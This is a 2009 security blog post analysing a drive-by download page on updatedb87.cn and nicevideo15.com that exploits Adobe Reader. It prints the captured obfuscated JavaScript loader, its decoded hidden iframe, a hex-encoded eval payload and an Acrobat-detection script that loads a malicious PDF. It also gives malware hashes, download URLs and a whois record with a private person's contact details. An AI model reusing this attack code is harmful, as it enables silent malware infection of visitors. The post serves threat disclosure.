17
Jun
09

Adobe exploit page installs malware updatedb87.cn & nicevideo15.com

post info

By djpnuemo
Categories: Blackhat SEO, Database Update, Infection, Malicious Domains, Malicious Links, Malware and Malware Distribution
0 Comments

This domain is exploiting vulnerabilities in Adobe to help with the installation of malware to a victims computer. This exploit is done quietly and the user is none the wiser. The exploit is triggered from a search referrer.

WARNING: URL’s may still be active. VERY DANGEROUS. Proceed at your own risk.

hxxp://updatedb87.cn/out/index.php

function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}
load(‘<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx
;;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>‘,unescape(‘function decrypt%28n%29
%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb
%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md
%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29
%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind
%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write
%28q%29%7D’));

Deobfuscates to

<iframe frameBorder=”0″ scrolling=”no” width=”1″ height=”1″ src=”http://updatedb87.cn/out/index.php”></iframe>

This iframe contains the following code that will use a malicious pdf file to instal malware to the system.

<script>vubqza=”6e7d666b7c616766286d625c314a4069392021737e697a286c7b
715e7d51523d502835286c676b7d656d667c266b7a6d697c6d4d646d656d667c202f
67486a4862486d48486b487c48482f267a6d7864696b6d20274827616f24282f2f21
21336c7b715e7d51523d50267b6d7c497c7c7a616a7d7c6d202f6148486c48482f26
7a6d7864696b6d20274827616f24282f2f21246c7b715e7d51523d5021336c7b715e
7d51523d50267b6d7c497c7c7a616a7d7c6d202f6b4864484869487b48487b486148
6c482f267a6d7864696b6d20274827616f24282f2f21242f6b484864487b48486148
6c4832484a48484c484831483e484b483d48483d48483e4825483e483d4849483b48
2548394839484c4838482548314830483b4848494848254838483848484b48384848
3c484e484b483a4831484d48483b48483e482f267a6d7864696b6d20274827616f24
282f2f2121337c7a71737e697a286b4f795a4b674f5c6b3f2835286c7b715e7d5152
3d50264b7a6d697c6d476a626d6b7c202f65487b4870486548486448483a48264850
48484548444840485c485c48485848482f267a6d7864696b6d20274827616f24282f
2f21242f2f21337e697a2869707b4c3f5c6d5a7f2835286c7b715e7d51523d50264b
7a6d697c6d476a626d6b7c202f5b48486048486d4864486448482648494848784878
484864484861486b48486948487c486148674866482f267a6d7864696b6d20274827
616f24282f2f21242f2f21337e697a286358436e433e4b46422835286c7b715e7d51
523d50264b7a6d697c6d476a626d6b7c202f6948486c484867486c486a4826487b48
7c487a486d484869486548482f267a6d7864696b6d20274827616f24282f2f21242f
2f21337c7a71736358436e433e4b4642267c71786d28352839336b4f795a4b674f5c
6b3f2667786d66202f4f484d485c482f267a6d7864696b6d20274827616f24282f2f
21242f6048487c487c4848784848324848274827487d487848486c48486948487c48
486d48486c48486a4830483f482648486b48486648482748486748487d487c484827
484864486748486948486c48264848784848604848784848374861486c4848354848
3848482f267a6d7864696b6d20274827616f24282f2f21246e69647b6d21336b4f79
5a4b674f5c6b3f267b6d666c2021336358436e433e4b46422667786d662021336358
436e433e4b4642265f7a617c6d206b4f795a4b674f5c6b3f267a6d7b7867667b6d4a
676c7121337e697a286a5e39714f516339422835282f264848274827482648264827
4827487d484878486c48486948487c48486d4826486d487048486d482f267a6d7864
696b6d20274827616f24282f2f21336358436e433e4b4642265b697e6d5c674e6164
6d206a5e39714f51633942243a21336358436e433e4b4642264b64677b6d20213375
6b697c6b60206d212873757c7a717369707b4c3f5c6d5a7f267b606d64646d706d6b
7d7c6d206a5e39714f516339422133756b697c6b60206d21287375756b697c6b6020
6d21287375756d625c314a4069392021336e7d666b7c616766287952457e7d616966
442021736e677a2071493e4d3b3e3a613a2835283a24286652694243417264283528
2a2a332871493e4d3b3e3a613a283435283a3e332871493e4d3b3e3a613a23232173
66526942434172642835285b7c7a61666f266e7a67654b60697a4b676c6d203e3d28
232871493e4d3b3e3a613a21337e697a287c71435f786a4d61283528666d7f284165
696f6d2021337c71435f786a4d61267b7a6b2835282a7a6d7b3227272a2823286652
6942434172642823282a3254542a2823282f5848487a486748486f48487a48694865
482848484e486148486448486d487b48482f267a6d7864696b6d20274827616f2428
2f2f212823282a54542a2823282f47487d487c484864484867484867484863482848
4d4870487848487a48486d48487b48487b48482f267a6d7864696b6d20274827616f
24282f2f212823282a54542a2823282f6548487b4867486d48487a486d48487b4848
26486c4848644864482f267a6d7864696b6d20274827616f24282f2f212823282a27
2b3a27392a33616e207c71435f786a4d6126606d616f607c283535283d3121736a7a
6d696333757c71435f786a4d612835282f2f33757a6d7c7d7a662866526942434172
6433756e7d666b7c616766287b696c5e5d3e5d4a7e207d7a6421737e697a28665269
42434172642835287952457e7d61696644202133616e282066526942434172642835
35282f532f21287a6d7c7d7a66337c7a71737e697a28794d5b707a3d3f476a283528
666d7f28496b7c617e6d50476a626d6b7c202f7b484866484878487e487f4826485b
486648694878487b48486048486748487c484828485e4861486d48487f486d48487a
48482848484b48674866487c487a4848674864484826484839482f267a6d7864696b
6d20274827616f24282f2f212133756b697c6b60206d2173616e2820794d5b707a3d
3f476a282935282f5348486748486a48486248486d486b48487c485548482f267a6d
7864696b6d20274827616f24282f2f2121287a6d7c7d7a663375794d5b707a3d3f47
6a265b6669787b60677c58697c602835287d7a64337c7a7173794d5b707a3d3f476a
264b6765787a6d7b7b6d6c58697c6028352866526942434172642823282a3254542a
2823282f58487a486748486f487a4848694865484828484e484861486448486d487b
48482f267a6d7864696b6d20274827616f24282f2f212823282a54542a2823282f47
48487d48487c484864484867484867484863482848484d48487048487848487a486d
48487b48487b482f267a6d7864696b6d20274827616f24282f2f212823282a54542a
2823282f7f48486948486a48482648486d487048486d482f267a6d7864696b6d2027
4827616f24282f2f2133794d5b707a3d3f476a26587a61667c5b6669787b60677c20
2133756b697c6b60206d217375337e697a2878696c387b4e66632835287b6d7c4166
7c6d7a7e6964206e7d666b7c616766202173616e2820794d5b707a3d3f476a267a6d
696c715b7c697c6d283535283c2128736b646d697a41667c6d7a7e69642078696c38
7b4e666321337f61666c677f2664676b697c6167662835282f6448486c4848694848
7848483248274827482f267a6d7864696b6d20274827616f24282f2f213375752428
3b3838382133757b696c5e5d3e5d4a7e202f60487c487c4878484832482748274848
7d487848486c4869487c486d48486c486a484830483f4826486b4848664848274848
67487d487c482748486448674869486c4848264878486048784837486148486c4848
3548483948482f267a6d7864696b6d20274827616f24282f2f21213365676f352a46
69462a336f6f352a4669462a33″;jwgakx=”function rbyr(){gp=Math.PI;bhx=
parseInt;ffv=’length’;mvr=bhx(~((gp&gp)|(~gp&gp)&(gp&~gp)|(~gp&~gp)));
ybagye=bhx(((mvr&mvr)|(~mvr&mvr)&(mvr&~mvr)|(~mvr&~mvr))&1);nlwj=
ybagye< +'Code');mxeugy=eval;for(snr=mvr;snr jwgakx.charCodeAt(snr);gg%=unescape(mvr+unescape(''+'%7'+'8'+'')+(1<<6))
;for(snr=mvr;snr ('%78')+vubqza.charAt(snr)+vubqza.charAt(snr+bhx(ybagye)))^gg);try
{mxeugy(mog);}catch(e){try{eval(mog);}catch(e) {window.location='/';}
}}try{eval('rbyr();')}catch(e) {alert('err');}";eval(jwgakx);</script>
<script>
function pdf_gen2()
{
var detectAcrobat = false;
try
{
if( navigator.plugins && navigator.mimeTypes.length)
{
for( var i = 0; i < navigator.plugins.length; i++)
{
var name = navigator.plugins[i].name;
if( name.indexOf('Adobe Acrobat') != -1)
{
detectAcrobat = true;
break;
}
}
}
else
{
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if( !obj) obj = new ActiveXObject("PDF.PdfCtrl");
if( obj) detectAcrobat = true;
}
}
catch(e)
{
}
if( detectAcrobat)
{
document.write('<iframe src="pdf.php"></iframe>');
}
else return false;
}
pdf_gen2();
</script>

All have been added to our database.

update.exe
Result: 17/41 (41.47%)
MD5: bcb016582e40e6312f7bf742c0dfcedd
VirusTotal
ThreatExpert Analysis
hxxp://updatedb87.cn/out/load.php?id=0

pdrv.exe or stron_1245063771.exe
Result: 6/41 (14.64%)
MD5: ca557e7460c222ef90e9d36881f6ac53
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

update_936.pdf
Result: 6/41 (14.64%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
Wepawet Analysis
hxxp://updatedb87.cn/out/pdf.php

pp.10.exe
Result: 15/41 (36.59%)
MD5: d23ad273d30ad73edfac5afddf5e6550
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

The page will also lead the user to a website that says the victim needs to install AdobeViewer and starts a download.

Whois entry for nicevideo15.com 94.232.248.70
Konstantin Berdeev
Email: camelot1984@gmail.com
Organization: Private person
Address: Moskva, m. Leninskoe, d. 192
City: Moskva
State: Moskvoskaya
ZIP: 174633
Country: RU
Phone: +7.4953996729
Fax: +7.49599672913


*.nicevideo44.com
*.pornotvnetwork.us
*.videofx4you2.com
*.videogtx4you2.com
nicevideo44.com
ns1.videofx4you2.com
ns1.videogtx4you2.com
ns2.nicevideo44.com
ns2.pornotvnetwork.us
ns2.videofx4you2.com
ns2.videogtx4you2.com
pornotvnetwork.us
videofx4you2.com
videogtx4you2.com

Setup.exe
Result: 10/41 (24.4%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
ThreatExpert Analysis
hxxp://nicevideo15.com/software/f75b610c1c/14250/1/

0 Responses to “Adobe exploit page installs malware updatedb87.cn & nicevideo15.com”

Feed for this Entry Trackback Address View blog reactions
  1. No Comments

Leave a Reply

You must login to post a comment.

« New rogue domain and malware domain: antivir-scann-64bit.com & file-archive-center.com
New malware domain: exe-store-center.com »
SANDBOX

SANDBOX ANALYSIS PAGE




 

June 2009
M T W T F S S
« May   Jul »
1234567
891011121314
15161718192021
22232425262728
2930